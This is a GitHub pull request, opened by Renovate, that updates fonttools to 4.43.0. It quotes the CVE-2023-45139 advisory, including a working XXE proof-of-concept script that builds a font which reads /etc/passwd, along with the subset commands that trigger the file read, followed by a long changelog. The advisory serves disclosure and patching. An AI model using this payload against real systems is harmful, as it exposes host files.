Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update dependency fonttools to v4.43.0 [SECURITY] #541

Closed
wants to merge 1 commit into from
Closed

Update dependency fonttools to v4.43.0 [SECURITY] #541

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link

@renovate renovate bot commented Jan 9, 2024

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
fonttools ==4.28.2 -> ==4.43.0 age adoption passing confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2023-45139

Summary

As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the bellow steps on a unix based system.

  1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.
from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&test;</text>
  </g>
</svg>
"""

def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    svg_table = newTable("SVG ")
    svg_table.docList = [
       (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table

    fb.font.save('poc-payload.ttf')

if __name__ == '__main__':
    main()
  1. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):
pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
  1. Read the parsed SVG table in the subsetted font:
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observed the included contents of the /etc/passwd file.

Impact

Note the final severity is dependant on the environment fontTools is running in.

  • The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

  1. Set the resolve_entities=False flag on parsing methods
  2. Consider further methods of disallowing doctype declarations
  3. Consider recursive regex matching

Release Notes

fonttools/fonttools (fonttools)

v4.43.0

Compare Source

  • [subset] Set up lxml XMLParser(resolve_entities=False) when parsing OT-SVG documents to prevent XML External Entity (XXE) attacks (9f61271): https://codeql.github.com/codeql-query-help/python/py-xxe/
  • [varLib.iup] Added workaround for a Cython bug in iup_delta_optimize that was leading to IUP tolerance being incorrectly initialised, resulting in sub-optimal deltas (6012643, cython/cython#5732).
  • [varLib] Added new command-line entry point fonttools varLib.avar to add an avar table to an existing VF from axes mappings in a .designspace file (0a3360e).
  • [instancer] Fixed bug whereby no longer used variation regions were not correctly pruned after VarData optimization (#​3268).
  • Added support for Python 3.12 (#​3283).

v4.42.1

Compare Source

  • [t1Lib] Fixed several Type 1 issues (#​3238, #​3240).
  • [otBase/packer] Allow sharing tables reached by different offset sizes (#​3241, #​3236, 457f11c).
  • [varLib/merger] Fix Cursive attachment merging error when all anchors are NULL (#​3248, #​3247).
  • [ttLib] Fixed warning when calling addMultilingualName and ttFont parameter was not passed on to findMultilingualName (#​3253).

v4.42.0

Compare Source

  • [varLib] Use sentinel value 0xFFFF to mark a glyph advance in hmtx/vmtx as non participating, allowing sparse masters to contain glyphs for variation purposes other than {H,V}VAR (#​3235).
  • [varLib/cff] Treat empty glyphs in non-default masters as missing, thus not participating in CFF2 delta computation, similarly to how varLib already treats them for gvar (#​3234).
  • Added varLib.avarPlanner script to deduce 'correct' avar v1 axis mappings based on glyph average weights (#​3223).

v4.41.1

Compare Source

  • [subset] Fixed perf regression in v4.41.0 by making NameRecordVisitor only visit tables that do contain nameID references (#​3213, #​3214).
  • [varLib.instancer] Support instancing fonts containing null ConditionSet offsets in FeatureVariationRecords (#​3211, #​3212).
  • [statisticsPen] Report font glyph-average weight/width and font-wide slant.
  • [fontBuilder] Fixed head.created date incorrectly set to 0 instead of the current timestamp, regression introduced in v4.40.0 (#​3210).
  • [varLib.merger] Support sparse CursivePos masters (#​3209).

v4.41.0

Compare Source

  • [fontBuilder] Fixed bug in setupOS2 with default panose attribute incorrectly being set to a dict instead of a Panose object (#​3201).
  • [name] Added method to removeUnusedNameRecords in the user range (#​3185).
  • [varLib.instancer] Fixed issue with L4 instancing (moving default) (#​3179).
  • [cffLib] Use latin1 so we can roundtrip non-ASCII in {Full,Font,Family}Name (#​3202).
  • [designspaceLib] Mark as optional in docs (as it is in the code).
  • [glyf-1] Fixed drawPoints() bug whereby last cubic segment becomes quadratic (#​3189, #​3190).
  • [fontBuilder] Propagate the 'hidden' flag to the fvar Axis instance (#​3184).
  • [fontBuilder] Update setupAvar() to also support avar 2, fixing _add_avar() call site (#​3183).
  • Added new voltLib.voltToFea submodule (originally Tiro Typeworks' "Volto") for converting VOLT OpenType Layout sources to FEA format (#​3164).

v4.40.0

Compare Source

  • Published native binary wheels to PyPI for all the python minor versions and platform and architectures currently supported that would benefit from this. They will include precompiled Cython-accelerated modules (e.g. cu2qu) without requiring to compile them from source. The pure-python wheel and source distribution will continue to be published as always (pip will automatically chose them when no binary wheel is available for the given platform, e.g. pypy). Use pip install --no-binary=fonttools fonttools to expliclity request pip to install from the pure-python source.
  • [designspaceLib|varLib] Add initial support for specifying axis mappings and build avar2 table from those (#​3123).
  • [feaLib] Support variable ligature caret position (#​3130).
  • [varLib|glyf] Added option to --drop-implied-oncurves; test for impliable oncurve points either before or after rounding (#​3146, #​3147, #​3155, #​3156).
  • [TTGlyphPointPen] Don't error with empty contours, simply ignore them (#​3145).
  • [sfnt] Fixed str vs bytes remnant of py3 transition in code dealing with de/compiling WOFF metadata (#​3129).
  • [instancer-solver] Fixed bug when moving default instance with sparse masters (#​3139, #​3140).
  • [feaLib] Simplify variable scalars that don’t vary (#​3132).
  • [pens] Added filter pen that explicitly emits closing line when lastPt != movePt (#​3100).
  • [varStore] Improve optimize algorithm and better document the algorithm (#​3124, #​3127).
    Added quantization option (#​3126).
  • Added CI workflow config file for building native binary wheels (#​3121).
  • [fontBuilder] Added glyphDataFormat=0 option; raise error when glyphs contain cubic outlines but glyphDataFormat was not explicitly set to 1 (#​3113, #​3119).
  • [subset] Prune emptied GDEF.MarkGlyphSetsDef and remap indices; ensure GDEF is subsetted before GSUB and GPOS (#​3114, #​3118).
  • [xmlReader] Fixed issue whereby DSIG table data was incorrectly parsed (#​3115, #​2614).
  • [varLib/merger] Fixed merging of SinglePos with pos=0 (#​3111, #​3112).
  • [feaLib] Demote "Feature has not been defined" error to a warning when building aalt and referenced feature is empty (#​3110).
  • [feaLib] Dedupe multiple substitutions with classes (#​3105).

v4.39.4

Compare Source

v4.39.3

Compare Source

v4.39.2

Compare Source

  • [varLib] Fixed regression introduced in 4.39.1 whereby an incomplete 'STAT' table would be built even though a DesignSpace v5 did contain 'STAT' definitions (#​3045, #​3046).

NOTE: The 4.39.1 distribution was "yanked" from PyPI to prevent users from accidentally upgrading to it.

v4.39.1

Compare Source

v4.39.0

Compare Source

  • [mtiLib] Optionally add Debg debug info for MTI feature builds (#​3018).
  • [ttx] Support reading input file from standard input using special - character, similar to existing -o - option to write output to standard output (#​3020).
  • [cython] Prevent cython.compiled raise AttributeError if cython not installed properly (#​3017).
  • [OS/2] Guard against ZeroDivisionError when calculating xAvgCharWidth in the unlikely scenario no glyph has non-zero advance (#​3015).
  • [subset] Recompute xAvgCharWidth independently of --no-prune-unicode-ranges, previously the two options were involuntarily bundled together (#​3012).
  • [fontBuilder] Add debug parameter to addOpenTypeFeatures method to add source debugging information to the font in the Debg private table (#​3008).
  • [name] Make NameRecord __lt__ comparison not fail on Unicode encoding errors (#​3006).
  • [featureVars] Fixed bug in overlayBox (#​3003, #​3005).
  • [glyf] Added experimental support for cubic bezier curves in TrueType glyf table, as outlined in glyf v1 proposal (#​2988):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-cubicOutlines.md
  • Added new qu2cu module and related qu2cuPen, the reverse of cu2qu for converting TrueType quadratic splines to cubic bezier curves (#​2993).
  • [glyf] Added experimental support for reading and writing Variable Composites/Components as defined in glyf v1 spec proposal (#​2958):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-varComposites.md.
  • [pens]: Added addVarComponent method to pen protocols' base classes, which pens can implement to handle varcomponents (by default they get decomposed).
  • [misc.transform] Added DecomposedTransform class which implements an affine transformation with separate translate, rotation, scale, skew, and transformation-center components (#​2598)
  • [sbix] Ensure Glyph.referenceGlyphName is set; fixes error after dumping and re-compiling sbix table with 'dupe' glyphs (#​2984).
  • [feaLib] Be cleverer when merging chained single substitutions into same lookup when they are specified using the inline notation (#​2150, #​2974).
  • [instancer] Clamp user-inputted axis ranges to those of fvar (#​2959).
  • [otBase/subset] Define __getstate__ for BaseTable so that a copied/pickled 'lazy' object gets its own OTTableReader to read from; incidentally fixes a bug while subsetting COLRv1 table containing ClipBoxes on python 3.11 (#​2965, #​2968).
  • [sbix] Handle glyphs with "dupe" graphic type on compile correctly (#​2963).
  • [glyf] endPointsOfContours field should be unsigned! Kudos to behdad for spotting one of the oldest bugs in FT. Probably nobody has ever dared to make glyphs with more than 32767 points... (#​2957).
  • [feaLib] Fixed handling of ignore statements with unmarked glyphs to match makeotf behavior, which assumes the first glyph is marked (#​2950).
  • Reformatted code with black and enforce new code style via CI check (#​2925).
  • [feaLib] Sort name table entries following OT spec prescribed order in the builder (#​2927).
  • [cu2quPen] Add Cu2QuMultiPen that converts multiple outlines at a time in interpolation compatible way; its methods take a list of tuples arguments that would normally be passed to individual segment pens, and at the end it dispatches the converted outlines to each pen (#​2912).
  • [reverseContourPen/ttGlyphPen] Add outputImpliedClosingLine option (#​2913, #​2914, #​2921, #​2922, #​2995).
  • [gvar] Avoid expanding all glyphs unnecessarily upon compile (#​2918).
  • [scaleUpem] Fixed bug whereby CFF2 vsindex was scaled; it should not (#​2893, #​2894).
  • [designspaceLib] Add DS.getAxisByTag and refactor getAxis (#​2891).
  • [unicodedata] map Zmth<->math in ot_tag_{to,from}_script (#​1737, #​2889).
  • [woff2] Support encoding/decoding OVERLAP_SIMPLE glyf flags (#​2576, #​2884).
  • [instancer] Update OS/2 class and post.italicAngle when default moved (L4)
  • Dropped support for Python 3.7 which reached EOL, fontTools requires 3.8+.
  • [instancer] Fixed instantiateFeatureVariations logic when a rule range becomes default-applicable (#​2737, #​2880).
  • [ttLib] Add main to ttFont and ttCollection that just decompile and re-compile the input font (#​2869).
  • [featureVars] Insert 'rvrn' lookup at the beginning of LookupList, to work around bug in Apple implementation of 'rvrn' feature which the spec says it should be processed early whereas on macOS 10.15 it follows lookup order (#​2140, #​2867).
  • [instancer/mutator] Remove 'DSIG' table if present.
  • [svgPathPen] Don't close path in endPath(), assume open unless closePath() (#​2089, #​2865).

v4.38.0

Compare Source

  • [varLib.instancer] Added support for L4 instancing, i.e. moving the default value of an axis while keeping it variable. Thanks Behdad! (#​2728, #​2861).
    It's now also possible to restrict an axis min/max values beyond the current default value, e.g. a font wght has min=100, def=400, max=900 and you want a partial VF that only varies between 500 and 700, you can now do that. You can either specify two min/max values (wght=500:700), and the new default will be set to either the minimum or maximum, depending on which one is closer to the current default (e.g. 500 in this case). Or you can specify three values (e.g. wght=500:600:700) to set the new default value explicitly.
  • [otlLib/featureVars] Set a few Count values so one doesn't need to compile the font to update them (#​2860).
  • [varLib.models] Make extrapolation work for 2-master models as well where one master is at the default location (#​2843, #​2846).
    Add optional extrapolate=False to normalizeLocation() (#​2847, #​2849).
  • [varLib.cff] Fixed sub-optimal packing of CFF2 deltas by no longer rounding them to integer (#​2838).
  • [scaleUpem] Calculate numShorts in VarData after scale; handle CFF hintmasks (#​2840).

v4.37.4

Compare Source

  • [subset] Keep nameIDs used by CPAL palette entry labels (#​2837).
  • [varLib] Avoid negative hmtx values when creating font from variable CFF2 font (#​2827).
  • [instancer] Don't prune stat.ElidedFallbackNameID (#​2828).
  • [unicodedata] Update Scripts/Blocks to Unicode 15.0 (#​2833).

v4.37.3

Compare Source

  • Fix arguments in calls to (glyf) glyph.draw() and drawPoints(), whereby offset wasn't correctly passed down; this fix also exposed a second bug, where lsb and tsb were not set (#​2824, #​2825, adobe-type-tools/afdko#1560).

v4.37.2

Compare Source

v4.37.1

Compare Source

  • [subset] Fixed regression introduced with v4.37.0 while subsetting the VarStore of HVAR and VVAR tables, whereby an AttributeError: subset_varidxes was thrown because an apparently unused import statement (with the side-effect of dynamically binding that subset_varidxes method to the VarStore class) had been accidentally deleted in an unrelated PR (#​2769, #​2773).
  • [pens] Added cairoPen (#​2768).
  • [gvar] Read gvar more lazily by not parsing all of the glyf table (#​2771).
  • [ttGlyphSet] Make drawPoints(pointPen) method work for CFF fonts as well via adapter pen (#​2770).

v4.37.0

Compare Source

v4.36.0

Compare Source

  • [varLib.models] Use a simpler model that generates narrower "tents" (regions, master supports) whenever possible: specifically when any two axes that actively "cooperate" (have masters at non-zero positions for both axes) have a complete set of intermediates.
    The simpler algorithm produces fewer overlapping regions and behaves better with respect to rounding at the peak positions than the generic solver, always matching intermediate masters exactly, instead of maximally 0.5 units off. This may be useful when 100% metrics compatibility is desired (#​2218, #​2717).
  • [feaLib] Remove warning when about GDEF not being built when explicitly not requested; don't build one unconditonally even when not requested (#​2744, also works around #​2747).
  • [ttFont] TTFont.getGlyphSet method now supports selecting a location that represents an instance of a variable font (supports both user-scale and normalized axes coordinates via the normalized=False parameter). Currently this only works for TrueType-flavored variable fonts (#​2738).

v4.35.0

Compare Source

  • [otData/otConverters] Added support for 'biased' PaintSweepGradient start/end angles to match latest COLRv1 spec (#​2743).
  • [varLib.instancer] Fixed bug in _instantiateFeatureVariations when at the same time pinning one axis and restricting the range of a subsequent axis; the wrong axis tag was being used in the latter step (as the records' axisIdx was updated in the preceding step but looked up using the old axes order in the following step) (#​2733, #​2734).
  • [mtiLib] Pad script tags with space when less than 4 char long (#​1727).
  • [merge] Use '.' instead of '#' in duplicate glyph names (#​2742).
  • [gvar] Added support for lazily loading glyph variations (#​2741).
  • [varLib] In build_many, we forgot to pass on colr_layer_reuse parameter to the build method (#​2730).
  • [svgPathPen] Add a main that prints SVG for input text (6df779f).
  • [cffLib.width] Fixed off-by-one in optimized values; previous code didn't match the code block above it (2963fa5).
  • [varLib.interpolatable] Support reading .designspace and .glyphs files (via optional glyphsLib).
  • Compile some modules with Cython when available and building/installing fonttools from source: varLib.iup (35% faster), pens.momentsPen (makes varLib.interpolatable 3x faster).
  • [feaLib] Allow features to be built for VF without also building a GDEF table (e.g. only build GSUB); warn when GDEF would be needed but isn't requested (#​2705, #​2694).
  • [otBase] Fixed AttributeError when uharfbuzz < 0.23.0 and repack method is missing (32aa8ea).
    Use new uharfbuzz.repack_with_tag when available (since uharfbuzz>=0.30.0), enables table-specific optimizations to be performed during repacking (#​2724).
  • [statisticsPen] By default report all glyphs (4139d89). Avoid division-by-zero (52b28f9).
  • [feaLib] Added missing required argument to FeatureLibError exception (#​2693)
  • [varLib.merge] Fixed error during error reporting (#​2689). Fixed undefined NotANone variable (#​2714).

v4.34.4

Compare Source

  • Fixed typo in varLib/merger.py that causes NameError merging COLR glyphs containing more than 255 layers (#​2685).

v4.34.3

Compare Source

  • [designspaceLib] Don't make up bad PS names when no STAT data (#​2684)

v4.34.2

Compare Source

  • [varStore/subset] fixed KeyError exception to do with NO_VARIATION_INDEX while subsetting varidxes in GPOS/GDEF (a08140d).

v4.34.1

Compare Source

  • [instancer] When optimizing HVAR/VVAR VarStore, use_NO_VARIATION_INDEX=False to avoid including NO_VARIATION_INDEX in AdvWidthMap, RsbMap, LsbMap mappings, which would push the VarIdx width to maximum (4bytes), which is not desirable. This also fixes a hard crash when attempting to subset a varfont after it had been partially instanced with use_NO_VARIATION_INDEX=True.

v4.34.0

Compare Source

  • [instancer] Set RIBBI bits in head and OS/2 table when cutting instances and the subfamily nameID=2 contains strings like 'Italic' or 'Bold' (#​2673).
  • [otTraverse] Addded module containing methods for traversing trees of otData tables (#​2660).
  • [otTables] Made DeltaSetIndexMap TTX dump less verbose by omitting no-op entries (#​2660).
  • [colorLib.builder] Added option to disable PaintColrLayers's reuse of layers from LayerList (#​2660).
  • [varLib] Added support for merging multiple master COLRv1 tables into a variable COLR table (#​2660, #​2328).
    Base color glyphs of same name in different masters must have identical paint graph structure (incl. number of layers, palette indices, number of color line stops, corresponding paint formats at each level of the graph), but can differ in the variable fields (e.g. PaintSolid.Alpha). PaintVar* tables are produced when this happens and a VarStore/DeltaSetIndexMap is added to the variable COLR table. It is possible for non-default masters to be 'sparse', i.e. omit some of the color glyphs present in the default master.
  • [feaLib] Let the Parser set nameIDs 1 through 6 that were previously reserved (#​2675).
  • [varLib.varStore] Support NO_VARIATION_INDEX in optimizer and instancer.
  • [feaLib] Show all missing glyphs at once at end of parsing (#​2665).
  • [varLib.iup] Rewrite force-set conditions and limit DP loopback length (#​2651). For Noto Sans, IUP time drops from 23s down to 9s, with only a slight size increase in the final font. This basically turns the algorithm from O(n^3) into O(n).
  • [featureVars] Report about missing glyphs in substitution rules (#​2654).
  • [mutator/instancer] Added CLI flag to --no-recalc-timestamp (#​2649).
  • [SVG] Allow individual SVG documents in SVG OT table to be compressed on uncompressed, and remember that when roundtripping to/from ttx. The SVG.docList is now a list of SVGDocument namedtuple-like dataclass containing an extra compressed field, and no longer a bare 3-tuple (#​2645).
  • [designspaceLib] Check for descriptor types with hasattr() to allow custom classes that don't inherit the default descriptors (#​2634).
  • [subset] Enable sharing across subtables of extension lookups for harfbuzz packing (#​2626).
    Updated how table packing falls back to fontTools from harfbuzz (#​2668).
  • [subset] Updated default feature tags following current Harfbuzz (#​2637).
  • [svgLib] Fixed regex for real number to support e.g. 1e-4 in addition to 1.0e-4. Support parsing negative rx, ry on arc commands (#​2596, #​2611).
  • [subset] Fixed subsetting SinglePosFormat2 when ValueFormat=0 (#​2603).

v4.33.3

Compare Source

  • [designspaceLib] Fixed typo in deepcopyExceptFonts method, preventing font references to be transferred (#​2600).
    Fixed another typo in the name of Range dataclass's __post_init__ magic method (#​2597).

v4.33.2

Compare Source

  • [otBase] Make logging less verbose when harfbuzz fails to serialize (#​2593).
    Do not exit at the first failure but continue attempting to fix offset overflow error using the pure-python serializer even when the USE_HARFBUZZ_REPACKER option was explicitly set to True. This is normal with fonts with relatively large tables, at least until hb.repack implements proper table splitting.

v4.33.1

Compare Source

  • [otlLib] Put back the FONTTOOLS_GPOS_COMPACT_MODE environment variable to fix regression in ufo2ft (and thus fontmake) introduced with v4.33.0 (#​2592, #​2593).
    This is deprecated and will be removed once ufo2ft gets updated to use the new config setup.

v4.33.0

Compare Source

  • [OS/2 / merge] Automatically recalculate OS/2.xAvgCharWidth after merging fonts with fontTools.merge (#​2591, #​2538).
  • [misc/config] Added fontTools.misc.configTools module, a generic configuration system (#​2416, #​2349).
    Added fontTools.config module, a fontTools-specific configuration system using configTools above.
    Attached a Config object to TTFont.
  • [otlLib] Replaced environment variable for GPOS compression level with an equivalent option using the new config system.
  • [designspaceLib] Incremented format version to 5.0 (#​2436).
    Added discrete axes, variable fonts, STAT information, either design- or user-space location on instances.
    Added fontTools.designspaceLib.split module to split a designspace into sub-spaces that interpolate and that represent the variable fonts listed in the document.
    Made instance names optional and allow computing them from STAT data instead.
    Added fontTools.designspaceLib.statNames module.
    Allow instances to have the same location as a previously defined STAT label.
    Deprecated some attributes:
    SourceDescriptor: copyLib, copyInfo, copyGroups, copyFeatures.
    InstanceDescriptor: kerning, info; glyphs: use rules or sparse sources.
    For both, location: use the more explicit designLocation.
    Note: all are soft deprecations and existing code should keep working.
    Updated documentation for Python methods and the XML format.
  • [varLib] Added build_many to build several variable fonts from a single designspace document (#​2436).
    Added fontTools.varLib.stat module to build STAT tables from a designspace document.
  • [otBase] Try to use the Harfbuzz Repacker for packing GSUB/GPOS tables when uharfbuzz python bindings are available (#​2552). Disable it by setting the "fontTools.ttLib.tables.otBase:USE_HARFBUZZ_REPACKER" config option to False. If the option is set explicitly to True but uharfbuzz can't be imported or fails to serialize for any reasons, an error will be raised (ImportError or uharfbuzz errors).
  • [CFF/T2] Ensure that pen.closePath() gets called for CFF2 charstrings (#​2577).
    Handle implicit CFF2 closePath within T2OutlineExtractor (#​2580).

v4.32.0

Compare Source

  • [otlLib] Disable GPOS7 optimization to work around bug in Apple CoreText. Always force Chaining GPOS8 for now (#​2540).
  • [glifLib] Added outputImpliedClosingLine=False parameter to Glyph.draw(), to control behaviour of PointToSegmentPen (6b4e2e7).
  • [varLib.interpolatable] Check for wrong contour starting point (#​2571).
  • [cffLib] Remove leftover GlobalState class and fix calls to TopDictIndex() (#​2569, #​2570).
  • [instancer] Clear AxisValueArray if it is empty after instantiating (#​2563).

v4.31.2

Compare Source

  • [varLib] fix instantiation of GPOS SinglePos values (#​2555).

v4.31.1

Compare Source

  • [subset] fix subsetting OT-SVG when glyph id attribute is on the root <svg> element (#​2553).

v4.31.0

Compare Source

  • [ttCollection] Fixed 'ResourceWarning: unclosed file' warning (#​2549).
  • [varLib.merger] Handle merging SinglePos with valueformat=0 (#​2550).
  • [ttFont] Update glyf's glyphOrder when calling TTFont.setGlyphOrder() (#​2544).
  • [ttFont] Added ensureDecompiled method to load all tables irrespective of the lazy attribute (#​2551).
  • [otBase] Added iterSubTable method to iterate over BaseTable's children of type BaseTable; useful for traversing a tree of otTables (#​2551).

v4.30.0

Compare Source

  • [varLib] Added debug logger showing the glyph name for which gvar is built (#​2542).
  • [varLib.errors] Fixed undefined names in FoundANone and UnsupportedFormat exceptions (ac4d561).
  • [otlLib.builder] Added windowsNames and macNames (bool) parameters to the buildStatTable function, so that one can select whether to only add one or both of the two sets (#​2528).
  • [t1Lib] Added the ability to recreate PostScript stream (#​2504).
  • [name] Added getFirstDebugName, getBest{Family,SubFamily,Full}Name methods (#​2526).

v4.29.1

Compare Source

  • [colorLib] Fixed rounding issue with radial gradient's start/end circles inside one another (#​2521).
  • [freetypePen] Handle rotate/skew transform when auto-computing width/height of the buffer; raise PenError wen missing moveTo (#​2517)

v4.29.0

Compare Source

  • [ufoLib] Fixed illegal characters and expanded reserved filenames (#​2506).
  • [COLRv1] Don't emit useless PaintColrLayers of lenght=1 in LayerListBuilder (#​2513).
  • [ttx] Removed legacy waitForKeyPress method on Windows (#​2509).
  • [pens] Added FreeTypePen that uses freetype-py and the pen protocol for rasterizating outline paths (#​2494).
  • [unicodedata] Updated the script direction list to Unicode 14.0 (#​2484).
    Bumped unicodedata2 dependency to 14.0 (#​2499).
  • [psLib] Fixed type of fontName in suckfont (#​2496).

v4.28.5

Compare Source

  • [svgPathPen] Continuation of #​2471: make sure all occurrences of str() are now replaced with user-defined ntos callable.
  • [merge] Refactored code into submodules, plus several bugfixes and improvements (#​2473, #​2475, #​2476):
    • fixed duplicate-glyph-resolution GSUB-lookup generation code;
    • use t

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@guardrails GuardRails
Copy link

guardrails bot commented Jan 9, 2024

⚠️ We detected 12 security issues in this pull request:

Vulnerable Libraries (12)
Severity Details
High pkg:pypi/[email protected] (t) upgrade to: 70f906c51ce49c485f1d355703e9cc3386b1cc2b,afd63b16170b7c047f5758eb910c416511e9c965,2.2.5,2.3.2
N/A pkg:pypi/[email protected] (t) upgrade to: 3.1.32
High pkg:pypi/[email protected] (t) upgrade to: 925760291d6efec64fda6e9dd1fd9cfbd5be068c,1.2.2
High pkg:pypi/[email protected] (t) upgrade to: 26.2.1,2.88.6,0.1.8,22.3.24,24.8.3,25.8.1,0.9.3,27.0.0-beta.2,10.0.1,0.2.6
High pkg:pypi/[email protected] (t) upgrade to: 2.4.0
Critical pkg:pypi/[email protected] (t) upgrade to: 9a3a981d70d2e9ec3344b5192f86fcaf3210cd85,2.1.1
High pkg:pypi/[email protected] (t) upgrade to: 70f906c51ce49c485f1d355703e9cc3386b1cc2b,afd63b16170b7c047f5758eb910c416511e9c965,2.2.5,2.3.2
Medium pkg:pypi/[email protected] (t) upgrade to: 3.1.35
High pkg:pypi/[email protected] (t) upgrade to: 1.2.2,925760291d6efec64fda6e9dd1fd9cfbd5be068c
High pkg:pypi/[email protected] (t) upgrade to: 24.8.3,25.8.1,2.88.6,10.0.1,0.2.6,22.3.24,0.9.3,26.2.1,27.0.0-beta.2,0.1.8
High pkg:pypi/[email protected] (t) upgrade to: 2.4.0
Critical pkg:pypi/[email protected] (t) upgrade to: 9a3a981d70d2e9ec3344b5192f86fcaf3210cd85,2.1.1

More info on how to fix Vulnerable Libraries in Python.

👉 Go to the dashboard for detailed results.

📥 Happy? Share your feedback with us.

@github-actions GitHub Actions
Copy link

Stale pull request message

@github-actions github-actions bot closed this Mar 18, 2024
@renovate Renovate
Copy link
Author

renovate bot commented Mar 18, 2024

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (==4.43.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.

@renovate renovate bot deleted the renovate/pypi-fonttools-vulnerability branch March 18, 2024 02:30
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
no-pr-activity
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants